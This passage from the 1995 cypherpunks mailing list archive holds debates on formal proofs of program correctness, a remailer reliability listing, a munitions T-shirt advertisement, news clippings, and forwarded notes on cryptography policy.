these "provers" find heretofore unobserved flaws, THEN I'll concede that 
they would be useful tools in mathematics--in uncovering flaws.  But they 
_still_ don't "prove" that these theorems are correct.  They only 
convince themselves.  But convincing me that I should believe them 
involves convincing me that there has been no failure in the program--at 
any of the levels I've previously discussed.  And, by the way, this is why 
the general mathematical community is still suspicious of the 4-color 
theorem.  In fact, the orginal "proof" contained a number of flaws.  
All discovered were all easily patched, but the fact that they existed in 
the first place means that we have no reason to believe that something 
subtle is yet to be discovered.

Nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Sun, 6 Aug 95 19:45:21 PDT
To: cypherpunks@toad.com
Subject: FC's Typs? (NewsClip)
Message-ID: <199508070245.VAA16849@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain




FBI may have partial set of Unabomber's prints


Washington, Aug. 6 (Reuter) -- The FBI may have a partial set
of fingerprints from the elusive Unabomber, now considered the
country's most wanted man, Newsweek magazine reported Sunday.

The partial set of prints, lifted from an explosive device
mailed several years ago, were uncovered with newly available
forensic technology, the magazine said.

While not certain the fingerprints belong to the serial
bomber, the report said federal agents believe that
identifying the prints could lead them to the Unabomber, whose
letter bombs have killed three people and injured 23 others
over 17 years.

Federal agents are seeking the bomber by looking for machines
he might use to construct his home-made pipe bombs, and are
trying to track the manual typewriter used to write the
bomber's lengthy anti-technology manifestos, Newsweek
reported.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sun, 6 Aug 95 20:23:53 PDT
To: Nathan Zook <nzook@bga.com>
Subject: Re: Pat Robertson Fears E-cash?
In-Reply-To: <Pine.3.89.9508020058.E23934-0100000@maria.bga.com>
Message-ID: <Pine.SUN.3.91.950806232140.17572A-100000@unix1.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Nathan Zook wrote:
> I believe that Pat Robertson is not aware of the privacy-enhancing 
> capabilities of e-cash.  In a probabilistic sense, he may well be right.

Not true. In the 700 Club transcript I have, David Chaum is interviewed, 
and the blinded digital cash he has invented is portrayed in a very 
positive light, as a way of enabling digital cash and avoiding the 
prophesies of Relevation.

There are more fundamentalist Christians involved in the crypto movement 
than you realize.
--
Michael Handler      | Cypherpunks: Civil Liberty through Complex Mathematics
handler@sub-rosa.com | 
grendel@netaxs.com   | "Let me ride on the Frankfort El, one more time..."
Philadelphia, PA     |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 6 Aug 95 20:29:50 PDT
To: nzook@bga.com (Nathan Zook)
Subject: Re: RSA has been proved correct
In-Reply-To: <Pine.3.89.9508061931.B8642-0100000@maria.bga.com>
Message-ID: <199508070329.XAA11774@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> there is a 125-page attempt at the Poincare' conjecture.  Try it.  If 
> these "provers" find heretofore unobserved flaws, THEN I'll concede that 
> they would be useful tools in mathematics--in uncovering flaws.  But they 
> _still_ don't "prove" that these theorems are correct.  They only 
> convince themselves.  But convincing me that I should believe them 
> involves convincing me that there has been no failure in the program--at 
> any of the levels I've previously discussed.  And, by the way, this is why 
> the general mathematical community is still suspicious of the 4-color 
> theorem.  In fact, the orginal "proof" contained a number of flaws.  
> All discovered were all easily patched, but the fact that they existed in 
> the first place means that we have no reason to believe that something 
> subtle is yet to be discovered.


   All you need to do is verify yourself (i.e. formally prove the
correctness of the theorem prover) to rely on the results of the
theorem prover. It's the web of trust model. And before you jump up and 
say "but how can you prove the theorem prover, maybe Godel...", there is a 
very simple theorem prover that is provable via mathematical induction. If 
you don't trust induction, then I don't know what to tell you. (it's like 
denying the Peano postulates) The theorem prover works like this:

Start off with your axiom set and your rules of production. (for instance,
a context free grammar, that might say "if x+y=z is a theorem, then
x+(y+1)=z+1 is a theorem") And enumerate all possible theorems on
the parse tree. If you reach theorems of length N that exceed the
theorem you're trying to prove than either it is a nontheorem or
undecidable. This procedure will never produce a "yes" answer for
a false theorem, although it will fail to prove some theorems. And it is
news to me that "the general mathematical community is still suspicious of
the four color theorem." Not only are they not suspicous of the theorem,
they aren't suspicious of the proof. It's been verified and reproduced
over and over again, and it has also been shortened down from the
original (I believe 2000+ special graph cases) to just over 400.
Physicists aren't suspicuous of relativity either.
[note above: the theorem prover fails if the production rules allow
theorem shortening. The system must be primitive recusive, but there
are many restricted domains of theorem proving which are.]


  The classification of the simple groups was a 1000+ page written
proof. Which one is would you trust to have a mistake somewhere? The
computer checked one, or the human checked one?

  This general line of discussion is getting out of hand. You can't
*prove* anything for sure. Even if it seems logical to you, how do you
know your own mind isn't buggy? How do you know you're not hallucinating?
Even something as simple as Euclids proof of the infinitude of primes.
You think it's been proved? ha! You are merely delusional. The rest of
us sane people saw the disproof years ago, but every time you start
to read the disproof, your mind goes into its own little universe
and starts substituting in screen memories making you *think* 
you just read a proof, not a disproof.
 
  Ultimately, you can't even trust yourself. The world is a risky
place, and sometimes you just have to live with the fact that one
day, something you chose to place faith in and rely on is going to be
pulled from underneath you.

-Ray





 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sun, 6 Aug 95 21:29:57 PDT
To: Michael Handler <grendel@netaxs.com>
Subject: Re: Pat Robertson Fears E-cash?
In-Reply-To: <Pine.SUN.3.91.950806232140.17572A-100000@unix1.netaxs.com>
Message-ID: <Pine.3.89.9508062303.S15677-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 6 Aug 1995, Michael Handler wrote:

> There are more fundamentalist Christians involved in the crypto movement 
> than you realize.

They already know about me.....

Nathan
Cypto-Christo-punk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 7 Aug 95 00:14:58 PDT
To: cypherpunks@toad.com
Subject: Quibbling about definitions of "proof"
Message-ID: <ac4b096d0102100487ad@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Look, you all, I'm *really sorry* I even brought up the subject of proofs
of correctness!

As I feared, any mention of certain loaded words immediately brings the
quibblers out of their lairs to dissect the "real meaning" of one or more
terms.

I had thought that my carefully worded mention of the Boyer-Moore prover
and that this means little for actual implementations would deter quibbling
over the cosmic significance of "proof." (An interesting topic, by the way,
as Ray's knowledgeable article makes clear. But metamathematics is an
arcane subject and short articles are rarely persuasive...we debated the
same stuff a couple of years ago on the Extropians list.)

With 700 subscribers, quibbling is the usual state of affairs. No matter
what is said, someone will quibble over terms or meanings. No wonder it is
the major venal sin at West Point.

The Boyer-Moorer theorem prover is an accepted ("Huh? Define what you mean
by "accepted"! Not all of us accept that term.") term of art. If you
disagree, or wish to raise the possibility that the computer glitched
during the proof, there are entire newsgroups devoted to such arcania.

On a more mundane note, my Internet Service Provider of the past 6 weeks
just sent out an urgent notice tonight announcing that they are no longer
"sensemedia.net" and have become "got.net" (as in "got net?" as in "got
milk?). This means my 3 years as "tcmay@netcom.com" is followed by 6 weeks
as "tcmay@sensemedia.net" and an as-yet-undetermined time as
"tcmay@got.net" (at least until the "Got milk?" ad people get wind of this
pun and tell them to change to something else.

--Tim May

Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sun, 6 Aug 95 22:50:13 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: RSA has been proved correct
In-Reply-To: <199508070329.XAA11774@clark.net>
Message-ID: <Pine.3.89.9508062316.U15677-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 6 Aug 1995, Ray Cromwell wrote:

>    All you need to do is verify yourself (i.e. formally prove the
> correctness of the theorem prover) to rely on the results of the
> theorem prover. 

Oh, is THAT all?  (more on this later)


> denying the Peano postulates)
(Perish the thought!)

>The theorem prover works like this:

<elided brute-force prover>

Do you advise using the unabridged Archimedian Sieve to determine if a 
number is prime?

> a false theorem, although it will fail to prove some theorems. 

Just feed it ~X as well.

> And it is
> news to me that "the general mathematical community is still suspicious of
> the four color theorem." Not only are they not suspicous of the theorem,
> they aren't suspicious of the proof. It's been verified and reproduced
> over and over again, and it has also been shortened down from the
> original (I believe 2000+ special graph cases) to just over 400.

Now we hit an impasse.  I thought the 4-color theorem was considered done 
as well, until a professor of mine contradicted me on this point.  It 
sounds like you might have more current info.  (Mine is 2-3 years old.)


> [note above: the theorem prover fails if the production rules allow
> theorem shortening. The system must be primitive recusive, but there
> are many restricted domains of theorem proving which are.]

Very restricted, I would think.  Most cases of universalizing would, I'ld 
guess.

>   The classification of the simple groups was a 1000+ page written
> proof. Which one is would you trust to have a mistake somewhere? The
> computer checked one, or the human checked one?

That depends on my trust of the human and of the checker.  Frankly, I'ld 
be leary of either.  (And I was told in Algebra that it was 10k+, but the 
point is basically the same.)

>   This general line of discussion is getting out of hand. You can't
> *prove* anything for sure. Even if it seems logical to you, how do you
> know your own mind isn't buggy? 

This is one of the points that I have pushed on this issue.  Our intution 
on many of these matters is _way_ off until you train it.  And still, 
there are famous cases of failure by trained people.

>   Ultimately, you can't even trust yourself. 

That's why we go to school.


Okay, on the subject of verifying theorem checkers:

First, you mention some distance into your post, that the theorems being 
checked must be "primitively recursive".  That rather limits you away 
from interesting theorems, wouldn't you say?  In particular, you couldn't 
dream of touching those earlier mentioned biggies.  But that's not all.  
Try the Galois theorems.  Fermat's little theorem?   Barre' catagory 
theorem?  Chinese Remainder Theorem?  Fundamental Theorem of Algebra?  
(In topology, in complex anal, in algebra...)

So I assume that the theorem checkers being deployed aren't limited to 
handling primitively recursive systems.  You now are dealing with a 
rather extensive program.  And proving that a general theorem prover 
works is _not_ something to just sit & do.

.......

Nathan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 7 Aug 95 02:18:29 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: There's a hole in your crypto...
In-Reply-To: <Pine.3.89.9508042253.A3820-0100000@jake.bga.com>
Message-ID: <9508070918.AA19988@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


No crypto/privacy relevance, delete or flame now....

Nathan writes:
> This is why the "not a Turing machine" assertion that the "Professor" is 
> important.  We know that Turing machine is undecidable, so if we want to 
> limit behavior, we can't have one.  BUT---we don't know that being a 
> Turing machine is equivalent to having "unpredictable" behavior.  
> Furthermore, a "proof" of the "not a Turing machine" assertion is going 
> to have to be done by--you guessed it--a computer.  And this computer is 
> running a program which definitely IS a Turing machine, if it is capable 
> of "proving" that other (suitably non-trivial) programs are not Turing 
> machines.

I think this is a bit misguided. The Turing machine (TM) is an extremely general
abstract model of computation. The gargantuan hunk of code that runs the 
Space Shuttle can be viewed as a Turing machine, as can a "Hello world" program
written in Visual BASIC. So, there's not really a question about whether or
not we're talking about Turing machines (unless perhaps you want to discuss
quantum theorem provers and QTMs :) 

Now, Rice's Theorem says that all non-trivial properties of TMs are undecidable.
If I pick a "non-trivial" property, I can't conceivably build a TM ("write a
program", if you like) that, upon input of the specification of an arbitrary TM,
can tell whether or not that TM exhibits the property I picked. This does not
mean that I can't decide whether some particular TMs have that property or not --
I can. I just can't write down a procedure that handles the general case.

Also, this theorem clearly hinges on the meaning of "trivial". From what I've
seen, a very strict interpretation is largely appropriate; nearly everything
except the least exciting of trivial low-level properties of TMs seems to come
out to be "non-trivial" in this regard. The proof of the theorem is more
precise about this, naturally, but I've found this useful as a working
colloquial definition.

-Futplex    
August 7, 1995     "Enola Gay, you should have stayed at home yesterday" -OMD



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 7 Aug 95 06:50:46 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199508071350.GAA09095@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 7 Aug 95 6:00:20 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
spook    remailer@spook.alias.net         *****+***-*+  1:17:21  99.99%
gondolin mixmaster@gondolin.org           * -++*-+****    43:12  99.98%
ford     remailer@bi-node.zerberus.de     .*-**++**-**    15:34  99.97%
portal   hfinney@shell.portal.com         ***#####****     3:17  99.94%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***##*#+#**      6:11  99.94%
replay   remailer@replay.com              ****+*******    11:17  99.87%
rmadillo remailer@armadillo.com           ++.-+*++-+**  1:36:12  99.84%
alumni   hal@alumni.caltech.edu           ***##******      4:08  99.83%
hacktic  remailer@utopia.hacktic.nl       ************    12:39  99.74%
crown    mixmaster@kether.alias.net       -----------   2:05:54  99.74%
vox      remail@vox.xs4all.nl             .-..-.....   23:52:15  99.99%
rebma    remailer@rebma.mn.org            -..+-.+..--  16:26:15  99.68%
vishnu   mixmaster@vishnu.alias.net       *****+* **--    36:02  99.32%
penet    anon@anon.penet.fi               - -**++-++*+  2:39:49  98.59%
hroller  hroller@c2.org                   *  -+*-#**+*    44:23  98.16%
syrinx   syrinx@c2.org                    -  --------   2:33:46  97.89%
mix      mixmaster@remail.obscura.com     -__.--------  6:25:13  97.55%
c2       remail@c2.org                    *  -++-+++-+  1:34:04  97.30%
extropia remail@extropia.wimsey.com       -.__..--.-.  15:02:35  96.68%
ideath   remailer@ideath.goldenbear.com   ..-  .-.--   12:33:17  95.40%
flame    remailer@flame.alias.net           ++++++++++    52:48  95.20%
rahul    homer@rahul.net                  ****#**++***     5:28  99.99%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dhenson@itsnet.com (Don Henson)
Date: Mon, 7 Aug 95 07:06:17 PDT
To: terra-libra@netcom.com
Subject: Over 350 'Munitions T-shirts' Shipped
Message-ID: <199508071416.IAA14134@scratchy.itsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


As of 27 July 1995, we have shipped over 350 of the RSA/Perl Munition 
T-shirts. Orders are still pouring in. Don't be left out. Order your's 
today.

Now you can wear a TSHIRT that has been classified as a MUNITION by the 
US Goverment. That's right! The US International Traffic in Arms 
Regulations (ITAR) makes exporting cyrptographic materials illegal. 
ITAR further defines export as providing cryptographic information to a 
non-US/Canadian citizen even if you are inside the US at the time. 
Providing information is further defined as telling or showing 
information to a non-US/Canadian citizen. The Munitions Tshirt has a 
Perl implementation of the RSA algorithm (the one used by PGP) printed 
on the front along with a bar-code of the same algorithm.

What all the above means is that if you wear the Munitions Tshirt where 
a non-US/Canadian citizen can see it, even if it is inside the US, you 
have just exported cryptographic material (which is already freely 
available outside the US) and have become a criminal in the eyes of the 
US Government. Now you too can become an international arms dealer for 
the price of a tshirt (US$15.95 - US$19.95, depending on size) and the 
guts to wear it.

If you are a non-US/Canadian citizen, you can still own a Munitons 
Tshirt by ordering the tshirt from a source that is outside the US. The 
email response to a request for info (see next paragraph) includes full 
instructions for ordering the tshirt no matter where you live.

For more information on how to own this classic example of civil 
disobedience, just send email to dhenson@itsnet.com with the subject of 
'SHIRT'. (You don't have to be a US/Canadian citizen to request the 
info.) Or, if you have WWW access, just point your Web browser to:

     http://colossus.net/wepinsto/wshome.html

By the way, 25% of the profits from the sale of the tshirt (in the 
US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help 
defend the author of PGP from harassment and possible prosecution by 
the Fedgoons.

And if you get arrested for wearing the Munitions Tshirt, we'll refund 
your purchase price.  :-)

Get your Munitions Tshirt now. Who knows how long they'll stay in 
production!

Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
West El Paso Information Network (WEPIN)
Check out The WEPIN Store at URL:
http://colossus.net/wepinsto/wshome.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 7 Aug 95 05:54:43 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
In-Reply-To: <9508070918.AA19988@cs.umass.edu>
Message-ID: <9508071253.AA10347@all.net>
MIME-Version: 1.0
Content-Type: text


> No crypto/privacy relevance, delete or flame now....
...
> Now, Rice's Theorem says that all non-trivial properties of TMs are undecidable.
> If I pick a "non-trivial" property, I can't conceivably build a TM ("write a
> program", if you like) that, upon input of the specification of an arbitrary TM,
> can tell whether or not that TM exhibits the property I picked. This does not
> mean that I can't decide whether some particular TMs have that property or not --
> I can. I just can't write down a procedure that handles the general case.
> 
> Also, this theorem clearly hinges on the meaning of "trivial". From what I've
> seen, a very strict interpretation is largely appropriate; nearly everything
> except the least exciting of trivial low-level properties of TMs seems to come
> out to be "non-trivial" in this regard. The proof of the theorem is more
> precise about this, naturally, but I've found this useful as a working
> colloquial definition.

Issue 1:

Undecidable for arbitrary programs does not mean undecidable for every
program.  For all finite programs with finite input sequences, all
properties are decidable.  Complexity may make proofs for large programs
infeasible at this time, but that is all.

Now back to the point of the discussion.  For certain classes of
programs, we can prove many things that are relevant to information
protection.  Furthermore, as we attempt these proofs, we may find and
fix the program anomolies (i.e., bugs) that would cause the program to
fail in an undesirable way.  Therefore, the proof techniques give us two
benefits - they help us fix the programs, and they help increase the
assurance that the programs do precisely what they are supposed to do
and nothing else.

Issue 2:

The notion that mathematics somehow excludes linguistic proofs
(forwarded I believe by a user with "may" in their email address) is
nonsense.  Mathematics at its core is based on linguistic notions that
are defined in plain language.  These notions develop a system of rules
which may be applied to decide the veracity of a proposition.  The
rules themselves form a language with syntax and semantics just as
the language that defines them has syntax and semantics.

The notion of separating language from mathematics is a fine and
interesting one, but it certainly does not apply to any mathematics
currently in widespread use.  A proof done without mathematical symbols
is no less a proof.

Issue 3:

Let's get back to the point of this discussion.  What can we really
prove about algorithms? I have made the assertion that an intersting
property for the purposes of assessing integrity, availability, and
confidentiality for servers like the W3 server and the gopher server is
the limitation of information flow.  I have backed up my assertion with
a demonstration in the form of programs that do this and English
demonstrations that that is of real value.

Does anyone disagree? Why? Is there a reason this same analytical
technique cannot be used on PGP or other cryptosystems to demonstrate
that there are no back doors (other than perhaps in the underlying
inadequacy of the overall technique)? How hard is it to do this for such
programs? What programming structures make this difficult? Will it
reveal many programming errors and therefor be a useful general purpose
tool for writing better programs?

Just thought I would stir things up a bit.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 7 Aug 95 09:18:48 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <ac4b8bc603021004275c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:53 PM 8/7/95, Dr. Frederick B. Cohen wrote:

>Issue 2:
>
>The notion that mathematics somehow excludes linguistic proofs
>(forwarded I believe by a user with "may" in their email address) is
>nonsense.  Mathematics at its core is based on linguistic notions that

Not this "May," so far as I can recall.

--Tim May

Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Mon, 7 Aug 95 07:02:20 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: (Fwd) Re: Law enforcement and PGP ban in Australia (fwd)
Message-ID: <Pine.SUN.3.91.950807100131.14342D-100000@frog.zoo2.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain





Followup on the Ozzies banning PGP:
------- Forwarded Message Follows -------
Date:          Mon, 07 Aug 1995 16:44:12 +1000
From:          "Danny Smith, AUSCERT" <D.Smith@auscert.org.au>
To:            mauvais@ocelot.llnl.gov
Cc:            first-teams@CSRC.NCSL.NIST.GOV
Subject:       Re: Law enforcement and PGP ban in Australia
Organization:  FIRST, the Forum of Incident Response & Security Teams
Reply-to:      "Danny Smith, AUSCERT" <D.Smith@auscert.org.au>

Paul (et al),

> I'm curious about what people have heard about this?
> 
> I'm trying to find out more from this end....doesn't look good...

Surprised you didn't come to us first.  :-)

> Subject: Australia next to ban PGP

I believe you can treat this as net.rumour.  I have the paper now, and will
read it tonight.  I will also talk to the author whom I am led to believe
is rather annoyed at the misrepresentation of the content of his paper.

More information later this week.

Danny Smith.

==========================================================================
 Danny Smith                      |  Fax:    +61 7 3365 4477
 AUSCERT                          |  Phone:  +61 7 3365 4417
 c/- Prentice Centre              |  (answered during business hours)
 The University of Queensland     |  (on call after hours for emergencies)
 Qld.  4072.  Australia           |  Internet:  auscert@auscert.org.au





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Aug 95 07:08:46 PDT
To: cypherpunks@toad.com
Subject: NYPotpourii
Message-ID: <199508071408.KAA26096@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Abject beg: it's easier for the 'droid to act on each item
   separately, do please request 1-by-1.


   8-7-95.  NYPaper:


   "A Cyberspace Front in a Multicultural War: Finding
   alternatives to a world where only English is typed."

      With the explosion of worldwide interest in the
      Internet, the dominance of English, stemming from the
      network's beginnings in the United States, has become a
      sensitive matter. A fear is that English, already the
      international language of business and science, is
      becoming the lingua franca of the computer world as
      well, further casting other languages in the shade. And
      some countries, already unhappy with the encroachment of
      American culture are worried that their cultures will be
      further eroded by an American dominance in cyberspace.
      A consortium of American computer companies has
      developed a universal digital code known as Unicode to
      allow computers to represent the letters and characters
      of virtually all the world's languages.        SEZ_who


   "Digital Commerce: 2 plans for watermarks, which can bind
   proof of authorship to electronic works." Denise Caruso's
   column.

      As information becomes currency in the global economy,
      that so-called digital watermark technologies are
      beginning to appear. As with their paper and broadcast
      counterparts, the concept behind digital watermarks is
      to provide a secure means to certify the origin,
      ownership and authenticity of digital works. And by
      doing so, they can provide the first line of defense
      against piracy of digital media like music, photographs,
      film, words and video games.                   MUN_due


   "Windows 95's Big Value May Be as a Lure to Network
   System."

      Is Windows 95 a decoy? For all the attention being paid
      to the Aug. 24 introduction of the Microsoft
      Corporation's updated personal computer operating
      system, some experts think the software's true strategic
      value to Microsoft is not the few billion dollars in
      sales it is expected to bring to the company over the
      next few years. Instead, the long-term value may lie in
      luring customers and software developers into adopting
      the company's other operating system: Windows NT, for
      corporate computer networks.                   COY_ote


   "Selling Virtual Reality, in Indiana: The owners were
   shocked by how few understood the technology."

      "Seeing the potential for educating had an incredible
      impact on me," said John Hammond, an Indianapolis
      businessman who stumbled on Virtually Yours when he and
      his son went to the shopping center for pizza. Mr.
      Hammond wants Virtually Yours to supply expertise and
      equipment to Sunship Ministries, a group of Christian
      business executives developing a design for a school,
      hospital and church complex suited for missionary work
      in developing countries. Mr. Hammond sees virtual
      reality as a marketing tool for getting developing
      countries to welcome them; he sees programs re-creating
      Bible stories as a powerful tool for preaching to
      nonreaders. "You could let people interact with a
      virtual Jesus," Mr. Hammond said.              GIT_rel


   "Dark Sun: The Making of the Hydrogen Bonb." [Book review]

      In the author's view the story of the hydrogen bomb is
      only secondarily a technological one. What mainly drove
      American physicists to design the more powerful bomb was
      the news that the Soviet Union possessed an atom bomb.
      And the reason the Russians had achieved the bomb was
      mainly spying, Mr. Rhodes insists. So his story of the
      H-bomb is not so much technology as the interaction of
      politics, diplomacy, war, espionage, theoretical and
      practical physics and paranoia.                JOX_onu









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kelly Goen <kelly@netcom.com>
Date: Mon, 7 Aug 95 10:13:03 PDT
To: dhenson@itsnet.com (Don Henson)
Subject: Re: Over 350 'Munitions T-shirts' Shipped
In-Reply-To: <199508071416.IAA14134@scratchy.itsnet.com>
Message-ID: <199508071710.KAA28434@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Where are mine...I got the money to you via
Mario wojo???? at SUN...
I ordered 8 of the shirts
BTW
I am the publisher of PGP 1.0 the only person
who will be indicted with Phil or alone for PGP
what about MY defense fund????

Check Gov Access for my story

    cheers
    kelly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Mon, 7 Aug 95 07:23:04 PDT
To: Joe McGuckin <joe@ns.via.net>
Subject: Re: Encrypted internet traffic to Singapore??
